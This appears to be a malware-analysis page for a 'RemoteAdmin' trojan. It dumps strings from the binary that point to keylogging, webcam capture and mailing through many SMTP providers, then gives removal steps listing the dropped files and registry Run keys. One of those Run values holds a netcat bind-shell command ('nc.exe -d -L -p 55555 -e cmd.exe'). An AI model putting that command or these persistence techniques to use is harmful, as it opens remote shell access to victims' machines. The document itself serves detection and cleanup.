SmartcardloginmsSmartcardLoginjoint-iso-itu-tJOINT-ISO-ITU-Tset-rootKeyThumbsetAttr-CertsetCext-cCertRequiredsetCext-certTypesetct-CertResTBEsetct-CertReqTBEXsetct-CertReqTBEsetct-AcqCardCodeMsgTBEsetct-CertInqReqTBSsetct-CertResDatasetct-CertReqTBSsetct-CertReqDatasetct-PCertResTBSsetct-PCertReqDatasetct-AcqCardCodeMsgcertificate extensionsset-certExtset-msgExtid-ecPublicKeyid-cmc-confirmCertAcceptanceid-cmc-getCertid-regInfo-certReqid-regCtrl-protocolEncrKeyid-regCtrl-oldCertIDid-it-revPassphraseid-it-keyPairParamRepid-it-keyPairParamReqid-it-unsupportedOIDsid-it-caKeyUpdateInfoid-it-encKeyPairTypesid-it-signKeyPairTypesid-it-caProtEncCertid-mod-attribute-certid-mod-qualified-cert-93id-mod-qualified-cert-88id-smime-aa-ets-certCRLTimestampid-smime-aa-ets-certValuesid-smime-aa-ets-CertificateRefsid-smime-aa-ets-otherSigCertid-smime-aa-smimeEncryptCertsid-smime-aa-signingCertificateid-smime-aa-encrypKeyPrefid-smime-aa-msgSigDigestid-smime-ct-publishCertid-smime-mod-msg-v3sdsiCertificatex509CertificatelocalKeyIDcertBagpkcs8ShroudedKeyBagkeyBagpbeWithSHA1And2-KeyTripleDES-CBCpbeWithSHA1And3-KeyTripleDES-CBCTLS Web Client AuthenticationTLS Web Server AuthenticationX509v3 Extended Key UsageextendedKeyUsageX509v3 Authority Key IdentifierauthorityKeyIdentifierX509v3 Certificate PoliciescertificatePoliciesX509v3 Private Key Usage PeriodprivateKeyUsagePeriodX509v3 Key UsagekeyUsageX509v3 Subject Key IdentifiersubjectKeyIdentifierNetscape Certificate SequencensCertSequenceNetscape CA Policy UrlnsCaPolicyUrlNetscape Renewal UrlnsRenewalUrlNetscape CA Revocation UrlnsCaRevocationUrlNetscape Revocation UrlnsRevocationUrlNetscape Base UrlnsBaseUrlNetscape Cert TypensCertTypeNetscape Certificate ExtensionnsCertExtextendedCertificateAttributeschallengePassworddhKeyAgreementBig Number part of OpenSSL 1.0.0d 8 Feb 2011ASN.1 part of OpenSSL 1.0.0d 8 Feb 2011keylen <= sizeof keyEVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)len>=0 && len<=(int)sizeof(ctx->key)j <= (int)sizeof(ctx->key)keylengthkeyfuncEVP part of OpenSSL 1.0.0d 8 Feb 2011.\crypto\pkcs12\p12_key.cSHA1 part of OpenSSL 1.0.0d 8 Feb 2011SHA-256 part of OpenSSL 1.0.0d 8 Feb 2011SHA-512 part of OpenSSL 1.0.0d 8 Feb 2011RSA part of OpenSSL 1.0.0d 8 Feb 2011RAND part of OpenSSL 1.0.0d 8 Feb 2011You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.htmlvalue.bagvalue.safesvalue.shkeybagvalue.keybagvalue.sdsicertvalue.x509certvalue.othercert_infohexkeyrsa_keygen_pubexprsa_keygen_bitsNETAPI32.DLLKERNEL32.DLLvalue.singlevalue.setPKCS8_PRIV_KEY_INFOpkeypkeyalgenc_keykey_enc_algorcertd.encryptedd.digestd.signed_and_envelopedd.envelopedd.signd.datad.otherX509_PUBKEYpublic_key.\crypto\asn1\x_pubkey.c%d.%d.%d.%d/%d.%d.%d.%d%*s%s:d.registeredIDd.iPAddressd.uniformResourceIdentifierd.ediPartyNamed.directoryNamed.dNSNamed.rfc822Named.otherNamename.relativenamename.fullnamecertificateHoldCertificate HoldcessationOfOperationCessation Of OperationkeyCompromiseKey Compromise%*sOnly Attribute Certificates%*sOnly CA Certificates%*sOnly User CertificatesAUTHORITY_KEYIDkeyidX509_CERT_PAIRX509_CERT_AUX%d.%d.%d.%dEC part of OpenSSL 1.0.0d 8 Feb 2011ECDSA part of OpenSSL 1.0.0d 8 Feb 2011.\crypto\ec\ec_key.cDSA part of OpenSSL 1.0.0d 8 Feb 2011Diffie-Hellman part of OpenSSL 1.0.0d 8 Feb 2011.\crypto\dh\dh_key.c\XIP Address:%d.%d.%d.%dURI:%sDNS:%semail:%sEdiPartyName:X400Name:othername:d.usernoticed.cpsuriCERTIFICATEPOLICIES%*sExplicit Text: %s%*sNumber%s:%*sOrganization: %s%*sCPS: %sddddddZddddddZpubkeypriv_keypub_keyEC_PRIVATEKEYpublicKeyprivateKeyvalue.implicitlyCAvalue.parametersvalue.named_curvep.char_twop.primep.ppBasisp.tpBasisp.onBasisp.other.\crypto\evp\evp_pkey.cECDH part of OpenSSL 1.0.0d 8 Feb 2011%'%1%=%C%K%O%s%.%.-.3.7.9.?.W.[.o.y.C%C'C3C7C9COCWCiC%s: (%d bit)Public-KeyPrivate-Keyrecommended-private-length: %d bitspublic-key:private-key:PKCS#3 DH Public-KeyPKCS#3 DH Private-KeyPublic-Key: (%d bit)Private-Key: (%d bit)X.509 part of OpenSSL 1.0.0d 8 Feb 2011OPENSSL_ALLOW_PROXY_CERTSx%s%s - d:d:d%.*s %d%s'() ,-./:=?CONF part of OpenSSL 1.0.0d 8 Feb 2011%*sPolicy Text: %s%*scrlUrl:EXTENDED_KEY_USAGE%*sZone: %s, User:.\crypto\x509v3\v3_akey.cPKEY_USAGE_PERIODkeyCertSignCertificate SignkeyAgreementKey AgreementkeyEnciphermentKey Encipherment.\crypto\x509v3\v3_skey.cMD5 part of OpenSSL 1.0.0d 8 Feb 2011PROXY_CERT_INFO_EXTENSIOND:/Projects/openssl-10.0d/ssl/certsD:/Projects/openssl-10.0d/ssl/cert.pemSSL_CERT_DIRSSL_CERT_FILEBasis Type: %sField Type: %sASN1 OID: %s%s %s%lu (%s0x%lx)%lu:%s:%s:%d:%sCONF_def part of OpenSSL 1.0.0d 8 Feb 2011[[%s]][%s] %s=%scrlUrlcertStatuscertIdOCSP_CERTSTATUSvalue.unknownvalue.revokedvalue.goodvalue.byKeyvalue.byNamereqCertOCSP_CERTIDissuerKeyHashcertsd.receiptListd.allOrFirstTierd.compressedDatad.authenticatedDatad.encryptedDatad.digestedDatad.envelopedDatad.signedDatad.orid.pwrid.kekrid.karid.ktriCMS_PasswordRecipientInfokeyDerivationAlgorithmkeyIdentifierCMS_KeyAgreeRecipientInforecipientEncryptedKeysCMS_OriginatorIdentifierOrKeyd.originatorKeyCMS_OriginatorPublicKeyCMS_RecipientEncryptedKeyCMS_KeyAgreeRecipientIdentifierd.rKeyIdCMS_RecipientKeyIdentifierCMS_OtherKeyAttributekeyAttrkeyAttrIdCMS_KeyTransRecipientInfoencryptedKeykeyEncryptionAlgorithmcertificatesd.crld.subjectKeyIdentifierd.issuerAndSerialNumberCMS_CertificateChoicesd.v2AttrCertd.v1AttrCertd.extendedCertificated.certificateCMS_OtherCertificateFormatotherCertotherCertFormat%s.dllPEM part of OpenSSL 1.0.0d 8 Feb 2011phrase is too short, needs to be at least %d charsEnter PEM pass phrase:TRUSTED CERTIFICATECERTIFICATE REQUESTNEW CERTIFICATE REQUESTCERTIFICATEX509 CERTIFICATEPRIVATE KEYENCRYPTED PRIVATE KEYANY PRIVATE KEY.\crypto\evp\evp_key.cnkey <= EVP_MAX_KEY_LENGTH?456789:;<=!"#$%&'()* ,-./0123Verifying - %sOpenSSL 1.0.0d 8 Feb 2011%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%sEXPORT56EXPORT40EXPORT.\ssl\ssl_cert.cSSLv3 part of OpenSSL 1.0.0d 8 Feb 2011TLSv1 part of OpenSSL 1.0.0d 8 Feb 2011SSLv2 part of OpenSSL 1.0.0d 8 Feb 2011s->session->master_key_length >= 0 && s->session->master_key_length < (int)sizeof(s->session->master_key)wrong number of key bitsunsupported status typeunsupported ssl versionunsupported protocolunsupported elliptic curveunsupported digest typeunsupported compression algorithmunsupported cipherunknown pkey typeunknown key exchange typeunknown certificate typeunable to find public key parametersunable to extract public keyunable to decode ecdh certsunable to decode dh certstried to use unsupported ciphertls peer did not respond with certificate listtls client cert req with anon ciphertlsv1 unsupported extensiontlsv1 certificate unobtainabletlsv1 bad certificate status responsetlsv1 bad certificate hash valuetlsv1 alert export restrictionsslv3 alert unsupported certificatesslv3 alert no certificatesslv3 alert certificate unknownsslv3 alert certificate revokedsslv3 alert certificate expiredsslv3 alert bad certificatesignature for non signing certificatereuse cert type not zeroreuse cert length not zeropublic key not rsapublic key is not rsapublic key encrypt errorpeer error unsupported certificate typepeer error no certificatepeer error certificatepeer did not return a certificatenull ssl method passedno publickeyno private key assignedno privatekeyPeer haven't sent GOST certificate, required for selected ciphersuiteno client cert receivedno client cert methodno ciphers passedno certificate specifiedno certificate setno certificate returnedno certificate assignedno certificates returnedmissing tmp rsa pkeymissing tmp rsa keymissing tmp ecdh keymissing tmp dh keymissing rsa signing certmissing rsa encrypting certmissing rsa certificatemissing export tmp rsa keymissing export tmp dh keymissing dsa signing certmissing dh rsa certmissing dh keymissing dh dsa certkrb5 server rd_req (keytab perms?)key arg too longinvalid ticket keys lengthhttp requesthttps proxy requesterror generating tmp rsa keyecc cert should have sha1 signatureecc cert should have rsa signatureecc cert not for signingecc cert not for key agreementcert length mismatchcertificate verify failedbad ecc certbad dh pub key lengthTLS1_SETUP_KEY_BLOCKtls1_cert_verify_macSSL_VERIFY_CERT_CHAINSSL_use_RSAPrivateKey_fileSSL_use_RSAPrivateKey_ASN1SSL_use_RSAPrivateKeySSL_use_PrivateKey_fileSSL_use_PrivateKey_ASN1SSL_use_PrivateKeySSL_use_certificate_fileSSL_use_certificate_ASN1SSL_use_certificateSSL_SET_PKEYSSL_SET_CERTSSL_SESS_CERT_NEWSSL_GET_SIGN_PKEYSSL_GET_SERVER_SEND_CERTSSL_CTX_use_RSAPrivateKey_fileSSL_CTX_use_RSAPrivateKey_ASN1SSL_CTX_use_RSAPrivateKeySSL_CTX_use_PrivateKey_fileSSL_CTX_use_PrivateKey_ASN1SSL_CTX_use_PrivateKeySSL_CTX_use_certificate_fileSSL_CTX_use_certificate_chain_fileSSL_CTX_use_certificate_ASN1SSL_CTX_use_certificateSSL_CTX_set_client_cert_engineSSL_CTX_check_private_keySSL_CHECK_SRVR_ECC_CERT_AND_ALGSSL_check_private_keySSL_CERT_NEWSSL_CERT_INSTANTIATESSL_CERT_INSTSSL_CERT_DUPSSL_add_file_cert_subjects_to_stackSSL_add_dir_cert_subjects_to_stackSSL3_SETUP_KEY_BLOCKSSL3_SEND_SERVER_KEY_EXCHANGESSL3_SEND_SERVER_CERTIFICATESSL3_SEND_CLIENT_KEY_EXCHANGESSL3_SEND_CLIENT_CERTIFICATESSL3_SEND_CERTIFICATE_REQUESTSSL3_OUTPUT_CERT_CHAINSSL3_GET_SERVER_CERTIFICATESSL3_GET_KEY_EXCHANGESSL3_GET_CLIENT_KEY_EXCHANGESSL3_GET_CLIENT_CERTIFICATESSL3_GET_CERT_VERIFYSSL3_GET_CERT_STATUSSSL3_GET_CERTIFICATE_REQUESTSSL3_GENERATE_KEY_BLOCKSSL3_CHECK_CERT_AND_ALGORITHMSSL3_ADD_CERT_TO_BUFSSL2_SET_CERTIFICATESSL2_GENERATE_KEY_MATERIALREQUEST_CERTIFICATEGET_CLIENT_MASTER_KEYDTLS1_SEND_SERVER_KEY_EXCHANGEDTLS1_SEND_SERVER_CERTIFICATEDTLS1_SEND_CLIENT_KEY_EXCHANGEDTLS1_SEND_CLIENT_CERTIFICATEDTLS1_SEND_CERTIFICATE_REQUESTDTLS1_OUTPUT_CERT_CHAINDTLS1_ADD_CERT_TO_BUFCLIENT_MASTER_KEYCLIENT_CERTIFICATEkey expansionclient write keyserver write keyc->iv_len <= (int)sizeof(s->session->key_arg)s->s2->key_material_length <= sizeof s->s2->key_materialCorrupt JPEG data: found marker 0xx instead of RST%dWarning: unknown JFIF revision number %d.dCorrupt JPEG data: %u extraneous bytes before marker 0xxInconsistent progression sequence for component %d coefficient %dUnknown Adobe color transform code %dObtained XMS handle %uFreed XMS handle %uUnrecognized component IDs %d %d %d, assuming YCbCrJFIF extension marker: RGB thumbnail image, length %uJFIF extension marker: palette thumbnail image, length %uJFIF extension marker: JPEG-compressed thumbnail image, length %uOpened temporary file %sClosed temporary file %sSs=%d, Se=%d, Ah=%d, Al=%dComponent %d: dc=%d ac=%dStart Of Scan: %d componentsComponent %d: %dhx%dv q=%dStart Of Frame 0xx: width=%u, height=%u, components=%dSmoothing not supported with nonstandard sampling ratiosRST%dAt marker 0xx, recovery action %dSelected %d colors for quantizationQuantizing to %d colorsQuantizing to %d = %d*%d*%d colors%4u %4u %4u %4u %4u %4u %4u %4uUnexpected marker 0xxMiscellaneous marker 0xx, length %uwith %d x %d thumbnail imageJFIF extension marker: type 0xx, length %uWarning: thumbnail image size does not match data length %uJFIF APP0 marker: version %d.d, density %dx%d %d= = = = = = = =Obtained EMS handle %uFreed EMS handle %uDefine Restart Interval %uDefine Quantization Table %d precision %dDefine Huffman Table 0xxDefine Arithmetic Table 0xx: 0xxUnknown APP14 marker (not Adobe), length %uUnknown APP0 marker (not JFIF), length %uAdobe APP14 marker: version %d, flags 0xx 0xx, transform %dUnsupported marker type 0xxFailed to create temporary file %sUnsupported JPEG process: SOF type 0xxCannot quantize to more than %d colorsCannot quantize to fewer than %d colorsCannot quantize more than %d color componentsInsufficient memory (case %d)Not a JPEG file: starts with 0xx 0xxQuantization table 0xx was not definedHuffman table 0xx was not definedBacking store not supportedCannot transcode due to multiple use of quantization table %dMaximum supported image dimension is %u pixelsEmpty JPEG image (DNL not supported)Bogus DQT index %dBogus DHT index %dBogus DAC value 0x%xBogus DAC index %dUnsupported color conversion requestToo many color components: %d, max %dBuffer passed to JPEG library is too smallJPEG parameter struct mismatch: library thinks size is %u, caller expects %uImproper call to JPEG library in state %dInvalid scan script at entry %dInvalid progressive parameters at scan script entry %dInvalid progressive parameters Ss=%d Se=%d Ah=%d Al=%dUnsupported JPEG data precision %dInvalid memory pool code %dWrong JPEG library version: library is %d, caller expects %dIDCT output block size %d not supportedInvalid component ID %d in SOSBogus message code %d;Warning: highpass filter disabled. highpass frequency too smallhttp://lame.sf.net3.99.5Opera?INTERNAL ERROR IN VBR NEW CODE, please send bug report@INTERNAL ERROR IN VBR NEW CODE (986), please send bug reportINTERNAL ERROR IN VBR NEW CODE (1313), please send bug reportmaxbits=%d usedbits=%dhip: invalid layer %dhip: error audio data exceeds framesize by %d byteship: bitstream problem, resyncing skipping %d bytes...Sorry, layer %d not supportedhip: Can't rewind stream by %d bits!hip: Bogus region length (%d)ADVAPI32.dllq%D,3QVisual C CRT: Not enough memory to complete call to strerror.Broken pipeInappropriate I/O control operationOperation not permitted%S#[k?#%X.y.\crypto\engine\eng_pkey.cRSA PRIVATE KEYDSA PRIVATE KEYEC PRIVATE KEYLoad certs from files in a directory%s%clx.%s%dunsupported typeunsupported recpientinfo typeunsupported recipient typeunsupported kek algorithmunsupported content typesigner certificate not foundprivate key does not match certificateno public keyno private keyno msgsigdigestno key or certno keynot supported for this key typenot key transportmsgsigdigest wrong lengthmsgsigdigest verification failuremsgsigdigest errorinvalid key lengthinvalid encrypted key lengtherror setting keyerror getting public keycertificate verify errorcertificate has no keyidcertificate already presentCMS_SIGNERINFO_VERIFY_CERTCMS_RecipientInfo_set0_pkeyCMS_RecipientInfo_set0_keyCMS_RecipientInfo_ktri_cert_cmpcms_msgSigDigest_add1CMS_GET0_CERTIFICATE_CHOICESCMS_EncryptedData_set1_keyCMS_decrypt_set1_pkeyCMS_decrypt_set1_keyCMS_add1_recipient_certCMS_add0_recipient_keyCMS_add0_certunsupported requestorname typeno certificates in chainerror parsing urlPARSE_HTTP_LINE1OCSP_parse_urlOCSP_cert_id_newunimplemented public key methodinvalid cmd numberinvalid cmd namefailed loading public keyfailed loading private keycmd not executableENGINE_UNLOAD_KEYENGINE_load_ssl_client_certENGINE_load_public_keyENGINE_load_private_keyENGINE_get_pkey_methENGINE_get_pkey_asn1_methENGINE_ctrl_cmd_stringENGINE_ctrl_cmdENGINE_cmd_is_executableunsupported versionunsupported md algorithminvalid signer certificate purposeess signing certificate erroress add signing cert errorTS_VERIFY_CERTTS_TST_INFO_set_msg_imprintTS_RESP_CTX_set_signer_certTS_RESP_CTX_set_certsTS_REQ_set_msg_imprintTS_MSG_IMPRINT_set_algoTS_CHECK_SIGNING_CERTSESS_SIGNING_CERT_NEW_INITESS_CERT_ID_NEW_INITESS_ADD_SIGNING_CERTfunctionality not supportedWIN32_JOINERunsupported pkcs12 modekey gen errorPKCS8_add_keyusagePKCS12_PBE_keyivgenPKCS12_newpassPKCS12_MAKE_SHKEYBAGPKCS12_MAKE_KEYBAGPKCS12_key_gen_uniPKCS12_key_gen_ascPKCS12_add_localkeyidunsupported optionunable to get issuer keyidpolicy syntax not currently supportedoperation not definedno proxy cert policy language definedno issuer certificateextension setting not supportedV2I_EXTENDED_KEY_USAGEV2I_AUTHORITY_KEYIDS2I_SKEY_IDS2I_ASN1_SKEY_IDR2I_CERTPOLunsupported cipher typeunknown operationunable to find certificatesigning not supported for this key typeoperation not supported on this typeno recipient matches keyno recipient matches certificateencryption not supported for this key typedecrypted key is wrong lengthPKCS7_add_certificateunsupported methodno port specifiedno port definedno accept port specifiedbroken pipeBIO_get_portECDH_compute_keydata too large for key sizeunsupported fieldpassed null parameternot a supported NIST primemissing private keykeys not setinvalid private keyPKEY_EC_SIGNPKEY_EC_PARAMGENPKEY_EC_KEYGENPKEY_EC_DERIVEPKEY_EC_CTRL_STRPKEY_EC_CTRLo2i_ECPublicKeyi2o_ECPublicKeyi2d_ECPrivateKeyEC_KEY_print_fpEC_KEY_printEC_KEY_newEC_KEY_generate_keyEC_KEY_copyEC_KEY_check_keyECKEY_TYPE2PARAMECKEY_PUB_ENCODEECKEY_PUB_DECODEECKEY_PRIV_ENCODEECKEY_PRIV_DECODEECKEY_PARAM_DECODEECKEY_PARAM2TYPEDO_EC_KEY_PRINTd2i_ECPrivateKeyzlib not supportedwrong public key typeunsupported public key typeunsupported encryption algorithmunsupported any defined by typeunknown public key typeunable to decode rsa private keyunable to decode rsa keystreaming not supportedprivate key header missingdigest and key type not supportedbad password readX509_PKEY_newi2d_RSA_PUBKEYi2d_PublicKeyi2d_PrivateKeyi2d_EC_PUBKEYi2d_DSA_PUBKEYd2i_X509_PKEYd2i_PublicKeyd2i_PrivateKeyd2i_AutoPrivateKeyunsupported algorithmunknown key typeunable to get certs public keypublic key encode errorpublic key decode errorno cert set for us to verifymethod not supportedloading cert dirkey values mismatchkey type mismatchcert already in hash tablecant check dh keyX509_verify_certX509_STORE_add_certX509_REQ_check_private_keyX509_PUBKEY_setX509_PUBKEY_getX509_load_cert_fileX509_load_cert_crl_fileX509_get_pubkey_parametersX509_check_private_keyGET_CERT_BY_SUBJECTADD_CERT_DIRPKEY_DSA_KEYGENPKEY_DSA_CTRLunsupported key componentsunsupported encryptionread keypublic key no rsaproblems getting passwordkeyblob too shortkeyblob header parse errorexpecting public key blobexpecting private key bloberror converting private keyPEM_WRITE_PRIVATEKEYPEM_READ_PRIVATEKEYPEM_READ_BIO_PRIVATEKEYPEM_PK8PKEYPEM_F_PEM_WRITE_PKCS8PRIVATEKEYDO_PK8PKEY_FPDO_PK8PKEYd2i_PKCS8PrivateKey_fpd2i_PKCS8PrivateKey_biounsupported salt typeunsupported private key algorithmunsupported prfunsupported key sizeunsupported key derivation functionunsupported keylengthunsuported number of roundsprivate key encode errorprivate key decode erroroperaton not initializedoperation not supported for this keytypeno operation setno key setkeygen failureinvalid operationexpecting a ec keyexpecting a ecdsa keyexpecting a dsa keyexpecting a dh keyexpecting an rsa keydifferent key typesctrl operation not implementedcommand not supportedcamellia key setup failedbn pubkey errorbad key lengthaes key setup failedPKEY_SET_TYPEPKCS5_v2_PBE_keyivgenPKCS5_PBE_keyivgenEVP_PKEY_verify_recover_initEVP_PKEY_verify_recoverEVP_PKEY_verify_initEVP_PKEY_verifyEVP_PKEY_sign_initEVP_PKEY_signEVP_PKEY_paramgen_initEVP_PKEY_paramgenEVP_PKEY_newEVP_PKEY_keygen_initEVP_PKEY_keygenEVP_PKEY_get1_RSAEVP_PKEY_get1_EC_KEYEVP_PKEY_GET1_ECDSAEVP_PKEY_get1_DSAEVP_PKEY_get1_DHEVP_PKEY_encrypt_oldEVP_PKEY_encrypt_initEVP_PKEY_encryptEVP_PKEY_derive_set_peerEVP_PKEY_derive_initEVP_PKEY_deriveEVP_PKEY_decrypt_oldEVP_PKEY_decrypt_initEVP_PKEY_decryptEVP_PKEY_CTX_dupEVP_PKEY_CTX_ctrl_strEVP_PKEY_CTX_ctrlEVP_PKEY_copy_parametersEVP_PKEY2PKCS8_brokenEVP_PKCS82PKEY_BROKENEVP_PKCS82PKEYEVP_CIPHER_CTX_set_key_lengthECKEY_PKEY2PKCS8ECDSA_PKEY2PKCS8DSA_PKEY2PKCS8DSAPKEY2PKCS8D2I_PKEYCAMELLIA_INIT_KEYAES_INIT_KEYinvalid public keyPKEY_DH_KEYGENPKEY_DH_DERIVEGENERATE_KEYCOMPUTE_KEYrsa operations not supportedkey size too smallinvalid keybitsillegal or unsupported padding modedigest too big for rsa keydata too small for key sizeRSA_generate_keyRSA_check_keyRSA_BUILTIN_KEYGENPKEY_RSA_VERIFYRECOVERPKEY_RSA_SIGNPKEY_RSA_CTRL_STRPKEY_RSA_CTRL.pp@0aEÐ(#EÚÚE<<0RC2 part of OpenSSL 1.0.0d 8 Feb 2011IDEA part of OpenSSL 1.0.0d 8 Feb 2011libdes part of OpenSSL 1.0.0d 8 Feb 2011DES part of OpenSSL 1.0.0d 8 Feb 2011NETSCAPE_CERT_SEQUENCE.\crypto\asn1\x_pkey.cRegDeleteKeyWRegCloseKeyRegCreateKeyExWRegOpenKeyExWRegQueryInfoKeyWRegEnumKeyExWReportEventAUrlIsWSHLWAPI.dllPSAPI.DLLWS2_32.dllCOMCTL32.dllShellExecuteWShellExecuteExWSHELL32.dllFtpPutFileWFtpCreateDirectoryWFtpRemoveDirectoryWFtpDeleteFileWFtpSetCurrentDirectoryWWININET.dllMPR.dllWINMM.dllVERSION.dllGetWindowsDirectoryWGetCPInfoGetConsoleOutputCPGetProcessHeapKERNEL32.dllUnregisterHotKeyRegisterHotKeyGetKeyNameTextWMapVirtualKeyWEnumWindowsEnumChildWindowsUnhookWindowsHookExSetWindowsHookExWGetKeyStateUSER32.dllGDI32.dllCOMDLG32.dllole32.dllOLEAUT32.dllPeekNamedPipe.?AVECSmtp@@zcÁK.uCi%U|4_iOu\cmd'.GL#!*%S_AnÂzj.yw(^XV.Bh.tC)l{.CC5E%C'[lfJp%9sF}.kd%7.Mvv4&.Ll`;%S*Bb18.ywL[%x`[.yg$4%FqsO-(0`;%S"jb%DqT,PA \StringFileInfo\lx\%s%Y-%m-%d_%H-%M-%S.mp3smtps.uol.com.br*@uol.com.brsmtp.hotpop.com*@hotpop.comsmtp.aim.com*@aim.comsmtp.mail.yahoo.com*@yahoo.comsmtp.gawab.com*@gawab.comsmtp.comcast.net*@comcast.netsmtp.ig.com.br*@ig.com.brmail.messagingengine.com*@fastmail.fmsmtp.aol.com*@aol.comsmtp.live.com*@hotmail.comsmtp.googlemail.com*@gmail.com;*@googlemail.comsmtp.mail.yahoo.com.br*@yahoo.com.brsmtp.gmx.com*@gmx.com;*@gmx.ussmtps.bol.com.br*@bol.com.brShell32.dllRICHED20.DLLWAdvapi32.dllHKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_PERFORMANCE_DATAHKEY_DYN_DATAHKEY_CURRENT_CONFIG@uxtheme.dll@()<>,;:\"[]Viewer.exeSoftware\Microsoft\Windows\CurrentVersion\RunSoftware\Microsoft\Windows\CurrentVersiontest335.txtTEST408.txtTEST408.txt/test335.txt4.0.3All Files (*.*)\Install.exe*.exe(*.exe)\TEST361.txt@USER32.DLL4.0.3®key=S.ICO\WinInit.Iniwininet.dllnetmsg.dll%Y-%m-%d_%H-%M-%S.jpgChttp://S%Y-%m-%d_%H-%M-%SCWebcam_Keys_.htmlcomctl32.dllDNSAPI.DLLWTL_CmdBar_InternalAutoPopupMsgWTL_CmdBar_InternalGetBarMsgmscoree.dllV*(%F@4 F7*72.JA1'[,'&"?4-%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nc.exe:1932
%original file name%.exe:580
virus.exe:1224
regedit.exe:972 - Delete the original RemoteAdmin file.
- Delete or disinfect the following files created/modified by the RemoteAdmin:
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\nc.exe (2025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\foto.jpg (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\wsetup.cmd (966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\virus.exe (33520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\INDEXH~1.TXT (122 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.01 (82 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.00 (2 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe (15021 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.02 (57 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ALW Start" = "%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Update" = "c:\windows\system32\nc.exe -d -L -p 55555 -e cmd.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Virus" = "c:\windows\system32\virus.exe andrescruzvtj@hotmail.com" - Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.